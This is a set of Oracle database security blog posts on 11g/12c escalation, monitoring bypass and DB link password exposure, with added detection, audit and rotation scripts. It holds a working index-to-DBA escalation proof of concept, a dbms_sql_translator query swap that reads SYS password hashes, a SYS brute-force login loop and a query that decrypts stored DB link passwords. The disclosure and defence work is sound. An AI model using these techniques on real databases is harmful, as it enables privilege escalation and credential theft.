Three Tier Oracle Security in London ~ Paul M. Wright

(nix, oracle, java, www, cloud ) intersect (safety, security, reliability, integrity)


INDEX to SYSDBA without SELECT

Hello Oracle Security Readers,

Combining the following three factors gives an escalation route from an index on a SYSTEM table to SYSDBA that does not require SELECT privilege on the indexed table:

1. SYSTEM passes its DBA role through its procedures.

2. Oracle indexes allow execution of functions on read, i.e. an INDEX can execute a function.

3. Oracle analyses indexes before they are used.

The PoC code is below:


@?/sqlplus/admin/pupbld.sql 

INSERT INTO PRODUCT_USER_PROFILE VALUES ('SQL*Plus', 'TEST', 'MODIFY', NULL, NULL, 'DISABLED', NULL, NULL); 

create user test identified by o; 
grant create session, create procedure, create any index to test; 

SQL*Plus: Release 11.2.0.2.0 Production on Wed Dec 11 09:47:26 2013 
Copyright (c) 1982, 2010, Oracle.  All rights reserved. 
Connected to: 
Oracle Database 11g Enterprise Edition Release 11.2.0.2.0 - Production 
With the Partitioning, OLAP, Data Mining and Real Application Testing options 

SQL> conn test/o 
Connected. 

SQL> CREATE OR REPLACE FUNCTION test.Y (GASP VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
       PRAGMA AUTONOMOUS_TRANSACTION;
     BEGIN
       EXECUTE IMMEDIATE 'GRANT DBA TO TEST';
       COMMIT;
       RETURN 'GASP';
     END;
     /
Function created. 

SQL> grant execute on test.y to public; 
Grant succeeded. 

SQL> create index system.escalation_index on system.SQLPLUS_PRODUCT_PROFILE(test.y('name')); 
Index created. 

SQL> set role dba;  
Role set.

So the ability to create an index can lead to SYSDBA. Oracle have made this harder to achieve in 12c by adding an INHERIT privilege requirement which blocks the code above, and that is another good reason to upgrade from 11g to 12c. I discuss this in my new book along with other issues; it is due for publication in April and is already available to purchase in Alpha format at http://www.apress.com/9781430262114
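As an added defender-side example (not part of the original post), the following SQL*Plus script checks a database for the two preconditions of the route above: accounts holding CREATE ANY INDEX, and function-based indexes on SYS- or SYSTEM-owned tables whose expression calls a function in some other schema. It assumes a DBA-level account and only the standard views DBA_SYS_PRIVS and DBA_IND_EXPRESSIONS; the regular expression and the "REVIEW:" output format are choices made here.

```sql
-- Added example, not from the original post: checks for the "INDEX to SYSDBA"
-- preconditions.  Run as a DBA.  Assumes only DBA_SYS_PRIVS and
-- DBA_IND_EXPRESSIONS; the regex and output format are this script's own.

-- 1. Who can create indexes on other schemas' tables?  This is the privilege the
--    PoC user above was granted; outside the DBA role it should be rare.
SELECT grantee, admin_option
FROM   dba_sys_privs
WHERE  privilege = 'CREATE ANY INDEX'
ORDER  BY grantee;

-- 2. Function-based indexes on dictionary-owner tables.  SYS/SYSTEM execute the
--    expression when the index is analysed or used, so any call into a non-SYS
--    schema deserves a look.  COLUMN_EXPRESSION is a LONG, so it cannot be
--    filtered with LIKE in SQL; list them all here and filter in PL/SQL below.
SELECT index_owner, index_name, table_owner, table_name, column_expression
FROM   dba_ind_expressions
WHERE  table_owner IN ('SYS', 'SYSTEM')
ORDER  BY table_owner, table_name;

-- 3. Same data, but only rows whose expression contains a schema-qualified call
--    ("OWNER"."FUNC"( ... ) to a schema other than SYS are printed.
SET SERVEROUTPUT ON
DECLARE
  v_expr VARCHAR2(4000);
BEGIN
  FOR r IN (SELECT index_owner, index_name, table_owner, table_name, column_expression
            FROM   dba_ind_expressions
            WHERE  table_owner IN ('SYS', 'SYSTEM')) LOOP
    v_expr := UPPER(r.column_expression);   -- LONG fetched into a VARCHAR2 copy
    IF REGEXP_LIKE(v_expr, '"?[A-Z0-9_$#]+"?\."?[A-Z0-9_$#]+"?\s*\(')
       AND NOT REGEXP_LIKE(v_expr, '^\s*"?SYS"?\.') THEN
      DBMS_OUTPUT.PUT_LINE('REVIEW: ' || r.index_owner || '.' || r.index_name ||
                           ' on ' || r.table_owner || '.' || r.table_name ||
                           ' -> ' || v_expr);
    END IF;
  END LOOP;
END;
/
```

For the index created in the PoC the third step prints a REVIEW line for SYSTEM.ESCALATION_INDEX with the expression "TEST"."Y"('name'). Dropping such an index and revoking CREATE ANY INDEX from accounts that do not need it removes the route on 11g; on 12c the INHERIT requirement the post mentions blocks it anyway.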

What sort of defences have organisations been using recently to combat attacks like the above? Surprisingly, there is still a large focus on network monitoring to implement DB security. I say surprisingly because recent DB security research has for some time been focused on controlling high privilege inside the DB. A privileged account can bypass network monitoring even when it is host based. A good example of bypassing a host-based network monitor (e.g. SNORT, Guardium et al.) is the dbms_sql_translator package introduced with 12c, demonstrated below:


conn / as sysdba

SQL> exec dbms_sql_translator.create_profile('BYPASSNETMON');

PL/SQL procedure successfully completed.

SQL> select object_name, object_type from dba_objects where object_name like 'BYPASSNETMON';

OBJECT_NAME
--------------------------------------------------------------------------------
OBJECT_TYPE
-----------------------
BYPASSNETMON
SQL TRANSLATION PROFILE

SQL> exec dbms_sql_translator.register_sql_translation('BYPASSNETMON','select username from dba_users','select user, password from sys.user$')

PL/SQL procedure successfully completed.

SQL> alter session set sql_translation_profile = BYPASSNETMON;

Session altered.

SQL> alter session set events = '10601 trace name context forever, level 32';

Session altered.

SQL> select username from dba_users;

USER
------------------------------
PASSWORD
----------------------------------------
SYS
987B14B42862C0C1

SQL> SELECT GRANTEE FROM DBA_TAB_PRIVS WHERE TABLE_NAME='DBMS_SQL_TRANSLATOR';

GRANTEE
--------------------------------------------------------------------------------
PUBLIC

To achieve this monitoring bypass, all that is required is the CREATE SQL TRANSLATION PROFILE privilege and ALTER SESSION. Gaining ALTER SESSION has been achievable, as my previous book showed: http://www.dba-oracle.com/forensics/t_forensics_vulnerable.htm

There are other methods to gain ALTER SESSION in newer versions of Oracle DB, and the CREATE SQL TRANSLATION PROFILE privilege is only needed at creation time, so verifying that a session is not being translated surreptitiously requires some expertise. More to come on this.

Ready-made methods to alert on unauthorised use of dbms_sql_translator are the native audit trail or, for high-security scenarios, a memory monitor such as McAfee's DB security monitoring tool, which provides strong protection: http://www.mcafee.com/us/products/database-activity-monitoring.aspx
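The native audit trail route, as an added example that is not from the original post: the script below lists who can create translation profiles, dumps every profile and registered translation so a dictionary base table appearing as a translated target stands out, and audits the package and ALTER SESSION so that switching a profile on leaves a record. It assumes 12c, a DBA account, traditional auditing with AUDIT_TRAIL set to DB,EXTENDED (so SQL_TEXT is kept), and the 12c views DBA_SQL_TRANSLATION_PROFILES and DBA_SQL_TRANSLATIONS with the column names used here (an assumption from memory of the 12c dictionary).

```sql
-- Added example, not from the original post: detection and audit of SQL
-- translation on 12c.  Assumes a DBA account, AUDIT_TRAIL=DB,EXTENDED and the
-- column names of DBA_SQL_TRANSLATION_PROFILES / DBA_SQL_TRANSLATIONS below.

-- 1. Who could have created a profile?  Creation is the only step that needs it.
SELECT grantee, admin_option
FROM   dba_sys_privs
WHERE  privilege = 'CREATE SQL TRANSLATION PROFILE';

-- 2. Every profile, and every registered translation.  A benign-looking source
--    text mapped to SYS.USER$ (or any other dictionary base table) is exactly
--    the pattern shown above with BYPASSNETMON.
SELECT owner, profile_name, translator
FROM   dba_sql_translation_profiles
ORDER  BY owner, profile_name;

SELECT owner, profile_name, sql_text, translated_text
FROM   dba_sql_translations
ORDER  BY owner, profile_name;

-- 3. Record use of the package and every ALTER SESSION, so a profile being
--    activated (not just created) is written to the audit trail.
AUDIT EXECUTE ON sys.dbms_sql_translator BY ACCESS;
AUDIT ALTER SESSION BY ACCESS;

-- 4. Review: package calls, plus any session that set a translation profile.
SELECT username, os_username, userhost, timestamp, action_name, obj_name, sql_text
FROM   dba_audit_trail
WHERE  obj_name = 'DBMS_SQL_TRANSLATOR'
   OR  UPPER(sql_text) LIKE '%SQL_TRANSLATION_PROFILE%'
ORDER  BY timestamp DESC;
```

AUDIT ALTER SESSION is noisy on a busy system, so in practice the review query is what gets scheduled, not a live alert on every record. The obvious caveat, and the reason the post points at an external memory monitor for high-security cases, is that an account with SYSDBA can switch the audit trail off as easily as it can create the profile.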

There are positives from a security perspective in 12c, and of course with Oracle we can add our own defences. The new book http://www.apress.com/9781430262114 adds the following protections among others:

  1. Incoming DB Link blocking using Native IPS
  2. Forensic rootkit detection
  3. Break-glass Access Control security
  4. Automated statechecking from root
  5. Adaptive security response using EM12c
  6. Fine grained user management
  7. Centralised audit trail lifecycle
  8. Vulnerability scanning for verification using Perl
  9. Securing privileged access control
  10. 12c decryptions and defenses

Anyway I won’t spoil the surprise – so enjoy your weekends!

Cheers,

Paul M. Wright

P.S. Commenting works now as the Maths Captcha plugin has dealt with the spambots

Hacktivity

Hi Guys,

OOW was the trip of a lifetime. Watching Oracle USA win the cup with Ben Ainslie was great, as was watching Larry’s keynote live. Columnar in memory DB looks interesting and competition for Hana.

I presented at the excellent Delphix event with OakTable, and picked up some good information to finalise some more book chapters.

It was good to meet Steven Karam as we had a discussion about ALTER USER IDENTIFIED BY VALUES bypassing account expiry. This is a security loophole in my experience, as it will enable legacy app account owners to avoid renewing their passwords if the Prod DBA expires them.

Off to Hacktivity tomorrow in Hungary to give a talk there on Friday 11th October at 12.40pm

https://hacktivity.com/en/hacktivity-2013/speakers/paul-m-wright1/

I will discuss some of the 12c research which is going into the book, which includes new privilege escalations and a new solution to block all incoming database links, which I am quite pleased with.

More details at hacktivity. See you there!

Cheers,
Paul
P.S. Amazon is taking pre-orders I note http://www.amazon.co.uk/Protecting-Oracle-Database-Paul-Wright/dp/1430262117

OOW and Oak Table

Hi Oracle Security Readers,
OOW is here again and I will be giving a short “In a nutshell” presentation on 12c security which will include – 3 good and 3 not so good points about 12c, as well as future research directions. 
The presentation will be at Table World http://www.kylehailey.com/oaktable-world/agenda/
This can be regarded as a short taster for the upcoming book. http://www.springer.com/computer/database+management+%26+information+retrieval/book/978-1-4302-6211-4

You know, 12c does have some good features, e.g. Definer Roles for Program Units, which works well and has the potential to solve the majority of privilege escalations by removing the need for PUBLIC. Also TCPS is free on all DB versions now, which is really great. Lots of work is needed to test that this upgrade integrates with other servers.

However there are some serious issues with 12.1.0.1.0 GA as a release, and also some design weaknesses that need to be borne in mind when implementing 12c. Additionally some of the issues found whilst testing 12c do port back to 11.2.0.3/4 which is a concern now.

I will be discussing the defenses to some of these issues in my Oak Table Presentation, and then later at Hacktivity in October https://hacktivity.com/en/hacktivity-2013/speakers/paul-m-wright1/. So OOW will get the defenses first!

Look forward to seeing you in San Francisco. Lastly I am in the process of transitioning general Oracle Security posts to www.OracleSecurity.Com which is hosted in the US.

Cheers,
Paul

_sys_logon_delay

Hi Oracle Security Folks,

Yes indeed, 12c is out. I have been working on 12c for 1.5 years and gave the first external 12c security presentation (of which I am aware) at UKOUG 2012 in Birmingham, so it is good to see that the product has finally been released. I like that the consolidation features are optional now. A lot of the currently unpublished 12c security research will be going into my Apress book Protecting Oracle (12c), due out in November, but I will be able to give some tasters here as we progress.

Firstly, thank you to Dani Schnider of Trivadis for referencing my Database Link Security paper.
Dani’s paper is available at this URL http://www.trivadis.com/uploads/tx_cabagdownloadarea/05-01-2013_Wie_sicher_sind_Database_Links.pdf and here in English translated by Google. Dani describes the idea of limiting a DB link to a specific account and then adding a context variable to legitimate DB Link logins using that account, which can then be used by the receiving database to grant access or not, using a trigger which checks for the correct context variable.

-- Dani's logon trigger as quoted above.  write_log is a logging procedure that
-- is not shown here and is assumed to be defined separately.
CREATE OR REPLACE TRIGGER dbl_logon_trg
AFTER LOGON ON DATABASE
DECLARE
  v_username VARCHAR2(30)  := sys_context('USERENV','SESSION_USER');
  v_dbl_info VARCHAR2(200) := sys_context('USERENV','DBLINK_INFO');
BEGIN
  IF v_username = 'ETL_USER' THEN
    IF v_dbl_info IS NULL THEN
      write_log('failed: direct login', v_username, v_dbl_info);
      raise_application_error(-20101, 'Direct login not allowed.');
    ELSIF v_dbl_info NOT LIKE 'SOURCE_GLOBAL_NAME=DWH_PROD, DBLINK_NAME=ETL_DBL%' THEN
      write_log('failed: wrong dblink', v_username, v_dbl_info);
      raise_application_error(-20102, 'Login from wrong database link not allowed.');
    ELSE
      write_log('successful login', v_username, v_dbl_info);
    END IF;
  END IF;
END dbl_logon_trg;
/

This is good advice but does not attempt to address the wider issue of how to stop incoming links for all accounts. That is more complex and needs "Native Intrusion Protection"; more to come on this in the book.

My DB Link paper was also picked up by Oracle.com https://forums.oracle.com/message/10951663, and it is nice to see Oracle openly discussing vulnerability. Mr A.C Hobbs would approve.

Gary Myers also kindly added observations regarding the transportation of a database link from one DB to another https://plus.google.com/117671444215575295808/posts/2kt3ztabToy (as discussed on oracle-l). This still works in 11.2.0.3, as shown below, though the ciphertext is longer now.

SQL> CREATE DATABASE LINK MYDBLINK
  2  CONNECT TO MYDBLINKACCOUNT IDENTIFIED BY MYDBLINKPASSWORD USING 'MYTARGEDB';

Database link created.

SQL> SELECT DBMS_METADATA.GET_DDL('DB_LINK',a.db_link,a.owner) FROM dba_db_links a;

DBMS_METADATA.GET_DDL('DB_LINK',A.DB_LINK,A.OWNER)
--------------------------------------------------------------------------------

  CREATE DATABASE LINK "MYDBLINK.ENTERPRISE.INTERNAL.CITY.AC.UK"
   CONNECT TO "MYDBLINKACCOUNT" IDENTIFIED BY VALUES '06D52ACA3DE41DDE1DCFEFC51D
08A1B314C470B8A03EE849C86A3DF703E888E2A8D4B7B3882570A15273FA7681B966EE74739907B6
C6A18AEB8CF7EB1871EA2C41D25342F4C0D102DA2BBAFB8F0330756938B26EEFFFAF5FD69E2CED7C
B2DDF34AB17D15D30E1DFE1C464D1F39D8A3A37EF80FFF8F085D6937D7158EFA503621'
   USING 'MYTARGEDB'

SQL> select * from v$version;

BANNER
--------------------------------------------------------------------------------
Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 - 64bit Production
PL/SQL Release 11.2.0.3.0 - Production
CORE    11.2.0.3.0      Production
TNS for 64-bit Windows: Version 11.2.0.3.0 - Production
NLSRTL Version 11.2.0.3.0 - Production

In my experience, possession of a copy of the ciphertext to create a copy of the link has a much lower impact than gaining the plaintext. The problem is that the plaintext password for low-privilege dblinks is often the same as that of other system accounts.

Of course 11.2.0.3 database links have completely changed how the encryption algorithm works: it is the same method as 12c. More on this in the book, in November.
It may be a good idea to reset those DB link passwords to unique values. 11.2 and above allows you to alter the password of the dblink directly with the following command, another improvement from Oracle.

ALTER DATABASE LINK private_link CONNECT TO hr IDENTIFIED BY hr_new_password;
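Putting that recommendation to work, as an added example that is not from the original post: the script below inventories the links in a database, finds remote accounts reused by more than one link (the password-sharing problem described above), and then rotates a private and a public link. It assumes 11.2 or later, a DBA account for the inventory queries, that the ALTER statements are run by the link owner, and that the link names and passwords in step 3 are placeholders. The new password must of course also be set on the remote account before the link is used again.

```sql
-- Added example, not from the original post: DB link inventory and rotation.
-- Assumes 11.2+ (ALTER DATABASE LINK), DBA access for the queries, and that the
-- ALTERs in step 3 are run by the owner of each link.  Names/passwords there are
-- placeholders.

-- 1. Every link: owner, remote account, where it points, and when it was made.
SELECT owner, db_link, username, host, created
FROM   dba_db_links
ORDER  BY username, owner, db_link;

-- 2. Remote accounts used by more than one link.  If one plaintext is recovered,
--    every link that reuses the account is exposed with it.
SELECT username,
       COUNT(*) AS links,
       LISTAGG(owner || '.' || db_link, ', ') WITHIN GROUP (ORDER BY owner, db_link) AS used_by
FROM   dba_db_links
WHERE  username IS NOT NULL
GROUP  BY username
HAVING COUNT(*) > 1;

-- 3. Rotation to unique values.  A private link is altered by its owner; a
--    public link uses ALTER PUBLIC DATABASE LINK.  Quoted passwords keep case
--    and punctuation.  (Placeholder names and values.)
ALTER DATABASE LINK private_link
  CONNECT TO hr IDENTIFIED BY "Replace-With-Unique-Pw-1";

ALTER PUBLIC DATABASE LINK shared_link
  CONNECT TO report_reader IDENTIFIED BY "Replace-With-Unique-Pw-2";

-- 4. Confirm the stored ciphertext changed after rotation: PASSWORDX in
--    SYS.LINK$ is rewritten when the link password is altered.
SELECT owner#, name, LENGTH(passwordx) AS ciphertext_len
FROM   sys.link$
ORDER  BY owner#, name;
```

Step 4 only shows that the ciphertext was rewritten, not that the new password is unique; that is what the output of step 2 is kept for, re-run after the rotation.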

Database links are interesting, but in terms of relative risk the issue of remote SYS brute forcing has caused more concern than any other, partly due to the inability to mitigate it. You will probably remember my SYS connection throttler, which was a DIY mitigation to the remote brute forcing issue documented in 2007 (needs FFox).

Well, here is some very good news: Oracle have implemented my recommendation, given before and during the Beta, to add a simple hidden parameter to slow down remote SYS brute forcing, and it is set to TRUE by default!

Introducing _sys_logon_delay (beams proudly at new parameter).

This addresses one of the biggest security concerns and I commend Oracle for following my recommendations. The point of this simple delay function is that users will be able to understand it and therefore use it confidently.

while true;do sqlplus -S -L sys/wrongpw@orlin:1521/orcl3 as sysdba;sleep 0;done;

ERROR:
ORA-01017: invalid username/password; logon denied
8< --- Slow steady pace between failed logons thus making remote brute force infeasible.

--can set to 0 to disable, or to higher value to slow down attacker, but needs a restart.
--e.g. alter system set "_sys_logon_delay"=0 scope=spfile;

SQL> select banner from v$version;

BANNER
--------------------------------------------------------------------------------
Oracle Database 12c Enterprise Edition Release 12.1.0.1.0 - 64bit Production
PL/SQL Release 12.1.0.1.0 - Production
CORE    12.1.0.1.0      Production
TNS for Linux: Version 12.1.0.1.0 - Production
NLSRTL Version 12.1.0.1.0 - Production

Let's have a look at what the new parameter looks like:

SQL> select a.ksppinm name, b.ksppstvl value, b.ksppstdf deflt,
            decode(a.ksppity, 1, 'boolean',
                              2, 'string',
                              3, 'number',
                              4, 'file',
                              a.ksppity) type,
            a.ksppdesc description
     from   sys.x$ksppi a,
            sys.x$ksppcv b
     where  a.indx = b.indx
     and    a.ksppinm = '_sys_logon_delay';

NAME
--------------------------------------------------------------------------------
VALUE
--------------------------------------------------------------------------------
DEFLT	  TYPE
--------- ----------------------------------------
DESCRIPTION
--------------------------------------------------------------------------------
_sys_logon_delay
1
TRUE	  number
failed logon delay for sys

It is satisfying to see a large company react positively to customer feedback and to have helped fix this problem. Thanks to everyone involved. There are of course many other problems to solve, as we shall see in due course.

Lastly, courtesy of Oracle/Apress I will be at OOW/JavaOne in September, taking part in a publishing seminar, and looking forward to seeing you there in sunny SF.

Regards,
Paul

Another Java Security Alert

Hi Oracle Security Folks,

Following the tradition of one-off Java Security Alerts, here is the Oracle Critical Patch Updates and Security Alerts page:
http://www.oracle.com/technetwork/topics/security/alerts-086861.html

Oracle Security Alert for CVE-2013-1493:
http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html

The reporters http://blog.fireeye.com/research/2013/02/yaj0-yet-another-java-zero-day-2.html say it is an unreliable exploit. Of course it depends on Java being used in the browser, so one fix is to unplug the JVM from the browser.

For the past ten years I have only used Java as a server-side technology, where it is actually making leaps and bounds. I had the pleasure of taking an Oracle Professional Training class on Java 7 new features recently and there are some very nice concurrency features that make separating and delegating tasks a lot easier to accomplish. This has made Java the predominant language of choice for universities, and also increased the usage of the NetBeans IDE, which I have found to be more stable than Eclipse and certainly better for writing JDBC applications. My point is that I think the technologists at Oracle are actually doing quite a good job with Java. Back to the DB now in prep for 12c; excitement mounts.

Cheers,
Paul

Oracle Dictionary Integrity Health Check

Hi,

It is good to check the integrity or health of a system to avoid future problems.

EXEC DBMS_HM.RUN_CHECK('Dictionary Integrity Check', 'my_run');

SET LONG 100000
SET LONGCHUNKSIZE 1000
SET PAGESIZE 1000
SET LINESIZE 512

SQL> SELECT DBMS_HM.GET_RUN_REPORT('MY_RUN') FROM dual;

DBMS_HM.GET_RUN_REPORT('MY_RUN')
--------------------------------------------------------------------------------
Basic Run Information
Run Name : my_run
Run Id : 141
Check Name : Dictionary Integrity Check
Mode : MANUAL
Status : COMPLETED
Start Time : 2013-02-10 13:46:11.861572 +00:00
End Time : 2013-02-10 13:50:43.713326 +00:00
Error Encountered : 0
Source Incident Id : 0
Number of Incidents Created : 0

Input Paramters for the Run
TABLE_NAME=ALL_CORE_TABLES
CHECK_MASK=ALL

Run Findings And Recommendations
Finding
Finding Name : Dictionary Inconsistency
Finding ID : 142
Type : FAILURE
Status : OPEN
Priority : CRITICAL
Message : SQL dictionary health check: file$ pk 42 on object FILE$
failed
Message : Damaged rowid is AAAAARAABAAAADpAAC – description: Filename
/home/oracle/app/oracle/oradata/orcl/pdbseed/system01.dbf is
referenced

Crikey – lots of output – but what does it all mean?

Alternatively...

SQL> SELECT AVG(dbms_utility.get_hash_value(text,1000000000,power(2,30))) FROM DBA_SOURCE WHERE OWNER='SYS';

AVG(DBMS_UTILITY.GET_HASH_VALUE(TEXT,1000000000,POWER(2,30)))
-------------------------------------------------------------
1564889684

Ahh, my dictionary is the same as before... cool.
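A sharper version of that quick check, as an added example that is not from the original post: one average over every line of SYS source can stay the same while a unit is altered, and it cannot say which unit changed. The script below keeps a per-object hash of the SYS-owned PL/SQL source in a baseline table and later diffs the live dictionary against it, reporting only units that changed, appeared or disappeared. It assumes a DBA account that may create a table, the standard DBA_SOURCE view, and the same DBMS_UTILITY.GET_HASH_VALUE call as above; the table name DICT_BASELINE and the inclusion of the line number in the hashed text are choices made here.

```sql
-- Added example, not from the original post: per-object integrity baseline of
-- SYS PL/SQL source.  Assumes DBA access and DBA_SOURCE; DICT_BASELINE is a name
-- chosen here.  The line number is prefixed to each line's text so that moved
-- or swapped lines change the hash, not just edited ones.

-- 1. Take the baseline (once, on a known-good system, e.g. after patching).
CREATE TABLE dict_baseline AS
SELECT owner, name, type,
       COUNT(*)                                                                 AS line_count,
       SUM(dbms_utility.get_hash_value(line || ':' || text, 1000000000, POWER(2,30))) AS src_hash,
       SYSTIMESTAMP                                                             AS taken_at
FROM   dba_source
WHERE  owner = 'SYS'
GROUP  BY owner, name, type;

-- 2. Compare the live dictionary with the baseline.  Only differences come back.
WITH live AS (
  SELECT owner, name, type,
         COUNT(*) AS line_count,
         SUM(dbms_utility.get_hash_value(line || ':' || text, 1000000000, POWER(2,30))) AS src_hash
  FROM   dba_source
  WHERE  owner = 'SYS'
  GROUP  BY owner, name, type
)
SELECT COALESCE(b.name, l.name) AS name,
       COALESCE(b.type, l.type) AS type,
       CASE
         WHEN b.name IS NULL THEN 'NEW'       -- unit exists now, not in baseline
         WHEN l.name IS NULL THEN 'MISSING'   -- unit in baseline, gone now
         ELSE 'CHANGED'                       -- same unit, different source hash
       END                       AS status,
       b.src_hash                AS baseline_hash,
       l.src_hash                AS live_hash,
       b.line_count              AS baseline_lines,
       l.line_count              AS live_lines
FROM   dict_baseline b
FULL OUTER JOIN live l
  ON   b.owner = l.owner AND b.name = l.name AND b.type = l.type
WHERE  b.name IS NULL OR l.name IS NULL OR b.src_hash <> l.src_hash
ORDER  BY status, name;

-- 3. One overall figure, comparable to the AVG() check above, for the run log.
SELECT COUNT(*) AS units, SUM(src_hash) AS total_hash, MAX(taken_at) AS baseline_taken
FROM   dict_baseline;
```

An empty result from step 2 is the "same as before" answer; a non-empty one names the unit to look at. Because anyone who can alter SYS source can also alter a baseline table stored in the same database, keep an exported copy of DICT_BASELINE off the host and compare against that when it matters.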

SQL> select banner from v$version;

BANNER
--------------------------------------------------------------------------------
Oracle Database 12c Enterprise Edition Release 12.1.0.0.2 - 64bit Beta
PL/SQL Release 12.1.0.0.2 - Beta
CORE    12.1.0.0.2      Beta
TNS for Linux: Version 12.1.0.0.2 - Beta
NLSRTL Version 12.1.0.0.2 - Beta

Cheers,
Paul

Java Security Alert

New Year – New vulnerabilities…yes it’s alert season again, with the main patch out on the 15th, but an out of band alert today for the Java 0 day. It is good to see Oracle taking this well publicised issue so seriously.

Here is the alert – http://www.oracle.com/technetwork/topics/security/alerts-086861.html

For an excellent advanced analysis please see this verified pdf https://partners.immunityinc.com/idocs/Java%20MBeanInstantiator.findClass%200day%20Analysis.pdf

For a more layman’s overview of Java Security this pdf is useful http://www.securingthehuman.org/newsletters/ouch/issues/OUCH-201301_en.pdf

I taught the first publicly available Java Security Course outside of the US in 2007 at SANS London, wrote the first Java Security exam (GSSP), and wrote and presented the first "Java Top 10 Security issues" in Orlando in 2008, which is still very relevant. Back then the story was the same as it is today: Java applets are insecure, don't use them, and strongly consider turning off Java in browsers.
Server-side Java is still a dominant language and probably will be for a while, though Java in the database itself has had both security and performance issues, as well as questions as to why use Java in the DB at all: is it to bring more processing to the DB to increase licensing for Oracle, say the cynics, or to enable fewer network transactions between app and DB pulling data backwards and forwards? Obviously it is nice to have a choice, but PL/SQL is a more efficient way to interact with the DB locally.
A larger question in many folks' minds will be why use Java at all? It was made popular because Sun had made it cross-platform, but does Oracle have the same cross-platform credibility as Sun? A JVM is slower than native code, so if cross-platform is less of a factor perhaps C will make a comeback. This logic is borne out by http://developers.slashdot.org/story/13/01/07/181219/c-beats-java-as-number-one-language-according-to-tiobe-index. Personally, I do a lot of text file log manipulation so I still use Perl as it is quicker (and have been recommended to try Lua, which is on the to-do list), and am intrigued by DBIx http://www.dbix-class.org/.
Agreed, for database connectivity JDBC is still king, so I am still glad I learnt Java at uni many moons ago, but the crux of this is that Java's expansion market has been Android, and the fear is that Oracle's lawyers scare companies away from innovating with the technology in a cross-platform way. I hope the concept of "Java Stewardship" extends to the legal department.

Anyway, lets hope that the new Oracle patch is reliable.

Keep safe,
Paul

UKOUG 2012 in a nutshell

Hi Oracle Security Folks,

UKOUG 2012 in a nutshell:

OAK Table day highlight was Julian's analysis of RAT capture formats, which made reverse engineering proprietary formats look a lot easier than it should do. Christian's super secret talk was so secret that it was not given, but I managed to catch up on that later.

Monday my presentation was surprisingly full up (OK, it was a small room), and no one fell asleep or ran screaming, so that classifies it as successful in my book. The slides are on UKOUG's web site but require a logon. In truth the talk went very well and the audience genuinely seemed to appreciate the hard work I had put in, and the contribution made by co-speaker Philip Weedon.

Afterwards, I wandered over to Grant Allen's talk. Grant made contributions from a Unix perspective, including how to log bash commands to syslog (cool), and re-iterated the benefits of centralising the audit trail. Had a chat after and started the post-talk celebrations, which resulted in going to bed at breakfast time. So that's why they call it "Bed and Breakfast". The rest of the two days should be annotated with the fact that it took me approximately two days to recover from the Monday night, but it was worth it as I had some very interesting talks about how DBA privilege is actually managed, in practice, which is different from the typical Identity Management perspective. More to come on this.

Tuesday was a later start and helped Pete with the Oracle Security Roundtable which was well attended with lively discussion.
Then Tom’s 12c talk which had some security perspectives. Tom’s presentation skills are second to none and he interacted with Hall 1 audience very naturally. What we know is there are a lot of new features for security in 12c as well a lot of extra products that can be purchased to enhance the security of the database.
Conversely, I think the actual core security of the central product has been degraded in some ways. For instance password complexity, account locking, password history, failed login throttling etc. are no longer effective on SYS in 11 upwards, and many of the OraSec "experts" and DBA managers are not aware of this because they are bombarded with extraneous information about extra add-ons which do not cure the core weaknesses.
I published sys_throttler to address this but a full solution is not trivial..so we can say that Oracle Security is not solved yet.

After Tom we headed to Gregory's Identity Management talk, which was a good overview of how to use OVD to manage DB users, and highlighted that Oracle can unexpectedly support two separate authentication mechanisms for one user (ref Pete), which is something I also alluded to in http://www.oracleforensics.com/wordpress/index.php/2008/09/21/bypassing-ora-01997/.

Identity Management of lower privileged accounts in Oracle is a good thing, but it certainly becomes more difficult once the users are privileged, as they can break the chains that bind them, hence the requirement for a compensating balance such as auditing.

Pete’s Wednesday 9 AM talk on audit trails, was a bit cloudy in my mind first time round, but reading the slides now they are making sense.
Pete showed using client_identifier as central identity through core audit…excellent battle worn advice.
Also discussed identifying sql injections and killing the session automatically…but difficult for a session to kill itself. This would be handy when trying to automatically defend against an attack. Obviously it is possible to call out to the OS but within the DB this is not so easy…work to do again.
Also Pete mentioned using a trigger to enable core audit to save on performance.
A lot of this changes in 12c but the concepts were very interesting…
Pete then transferred to DBA access control mode and described how the power of the DBA can be controlled through individual proxy users proxying to a core dba role which is customised. This is a good strategy for BAU. The problem is of course that to carry out imports/exports and user management the ALTER USER privilege is needed and any user with this or execute on dbms_sys_sql etc can act as a different user so it is not a solution for highest privilege.
Break-glass and time-based access control is the way forward for taming the top dog privileges in my view/experience, though splitting SYSDBA into separate system privileges goes towards taming SYS, e.g. SYSBACKUP and SYSAUD et al.

Pythian were prominent with some interesting work on Human reliability and Privileged Access Monitoring. Absolute applications were busy with their training offerings and DSP had 6 presentations so the vendor element looked healthy.

I would have liked to have gone to…
-Guido Schmutz’s NoSQL presentation but the PDF reads well.
-Carl Dudley’s Audit trail presentation was thorough and of immediate practicable use in 11g.
-Owen Ireland’s Goldengate presentation is an excellent quick start intro for DBA.
-Hitachi’s Muthukumar did a detailed presentation on localisation in Oracle for EU.
-Portix’s Bjorn Rost did an informative presentation on Total Recall listing the virtual columns and AS OF syntax.
Of course there are loads others, these are just the presentations that caught my eye.

The general opinion was that the conference was better than last year. I can’t vouch for that as I wasn’t there last year due to work commitments, but I certainly enjoyed catching up with old friends. Next year I am informed the conference for DB will be in Manchester which is the home of my MSc CS department, Mr Turing, and some of the best music to grace our charts, as well as a special breed of mega pub (ref Moon Under the Water), though the Lass O’ Gowrie aims for quality rather than quantity. In short Manchester is literally a cool place and thankfully still serviced by Virgin trains, so see you there next year.

Thank you to all the excellent presenters this year who have increased my understanding yet again.
It is interesting to see how California’s Oracle User group compares http://www.nocoug.org/presentations.html

Cheers,
Paul

SYS Security

Hello Folks,

A few people have told me that they thought only SYS could select DB link passwords.
The truth is that any user with SELECT_CATALOG_ROLE can select the passwords from ku$_dblink_view as well.

SQL> select name, userid, utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr(passwordx,19)), 4353, (substr(passwordx,3,16)))) password from ku$_dblink_view;

NAME
--------------------------------------------------------------------------------
USERID
------------------------------
PASSWORD
--------------------------------------------------------------------------------
TEST_LINK.ENTERPRISE.INTERNAL.UK
DBLINK_ACCOUNT
mongo

If EXECUTE on dbms_crypto is missing, then the ciphertext may need to be copied over to another DB under the control of the attacker.

